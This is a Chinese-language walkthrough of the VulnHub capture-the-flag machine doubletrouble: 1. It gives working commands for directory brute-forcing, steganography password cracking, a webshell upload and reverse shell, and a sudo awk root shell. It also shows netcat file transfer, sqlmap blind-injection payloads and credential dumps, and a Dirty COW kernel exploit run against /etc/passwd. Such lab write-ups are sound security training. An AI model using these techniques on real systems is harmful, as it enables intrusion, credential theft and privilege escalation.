- 英文名稱:doubletrouble: 1
- 中文名稱:雙重煩惱:1
- 釋出日期:2021 年 9 月 11 日
- 難度:容易
- 描述:關于 vm:測試并從 virtualbox 導出。啟用 dhcp 和嵌套 vtx/amdv。您可以通過電子郵件與我聯系以擷取故障排除或問題。
- 下載下傳位址:https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
1、主機發現(192.168.199.107)
主機發現
2、端口掃描,發現22端口和80端口
端口掃描
3、通路web頁面
4、搜尋web元件漏洞
web元件漏洞
5、發現web目錄
┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://192.168.199.107/uploads/
==> DIRECTORY: http://192.168.199.107/backups/
==> DIRECTORY: http://192.168.199.107/secret/
...
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5
6、發現一個秘密檔案
線索
7、嘗試對圖檔進行提取嵌入資訊
steghide info doubletrouble.jpg
嘗試提取圖檔中的資訊
8、使用Stegseek破解經過Steghide隐寫的資料[1]
Stegseek是迄今為止全世界最快的Steghide破解器,該工具每秒能夠處理數百萬的密碼。
值得一提的是,僅需兩秒鐘,該工具就可以跑完rockyou.txt字典。
而衆所周知,rockyou.txt是一個包含了超過1400萬個密碼的強大字典檔案。
─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt
得到密碼:92camaro
秒出密碼:92camaro
9、再次提取圖檔中的嵌入資訊,得到郵箱和密碼
┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out
[email protected]
otis666
得到web管理者密碼
10、進入web背景,新增使用者 ailx10
新增使用者 ailx10
11、切換賬号,建立項目,上傳webshell
上傳webshell
12、反彈shell
反彈shell
13、檢視sudo,發現awk特權指令不需要密碼
更新root
14、更新到root權限,竟然發現另一個靶機,果然是個老六
sudo awk 'BEGIN {system("/bin/sh")}'
遇見老六
15、nc 下載下傳到本地
服務端:
nc -lvp 4444 > ailx10_double_trouble.ova
用戶端:
nc 192.168.199.247 4444 < doubletrouble.ova
下載下傳第二個 ova
16、開啟第二個靶機,重新再來一遍滲透流程
第二個靶機
17、主機發現,多了一個IP:192.168.199.171
新增一個IP位址:192.168.199.171
18、端口掃描,發現22、80端口
端口掃描
19、通路web頁面
web頁面
20、嘗試sqlmap注入
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---
存儲sql注入漏洞
21、嘗試獲得資料庫名字(doubletrouble)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db
資料庫名
22、嘗試獲得表名稱(users)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables
表名
23、嘗試獲得字段名稱(username,password)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns
字段名稱
24、嘗試獲得表中的字段内容
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1 |
| clapton | ZubZub99 |
+----------+----------+
字段内容
25、嘗試ssh登入,獲得普通使用者的flag
ssh登入,獲得普通flag
26、擷取系統資訊,嘗試發現漏洞
系統資訊
提權POC
27、編譯45010發現缺少檔案,隻好上髒牛[2]
髒牛漏洞(CVE-2016–5195),影響低版本的Linux系統
Centos7/RHEL7 3.10.0-327.36.3.el7
Cetnos6/RHEL6 2.6.32-642.6.2.el6
Ubuntu 16.10 4.8.0-26.28
Ubuntu 16.04 4.4.0-45.66
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1
漏洞具體是由于get_user_page核心函數在處理Copy-on-Write的過程中,可能産出競态條件造成COW過程被破壞,導緻出現寫資料到程序位址空間内隻讀記憶體區域的機會。
修改su或者passwd程式就可以達到root的目的。
clapton@doubletrouble:~$ ls
45010.c dirty.c user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c dirty dirty.c user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash
mmap: 7f49735fb000
28、提權,獲得root的flag
獲得root的flag
到此,實驗完成~
參考
- ^stegseek https://github.com/RickdeJager/stegseek/releases
- ^髒牛 https://github.com/firefart/dirtycow
編輯于 2022-08-21 21:08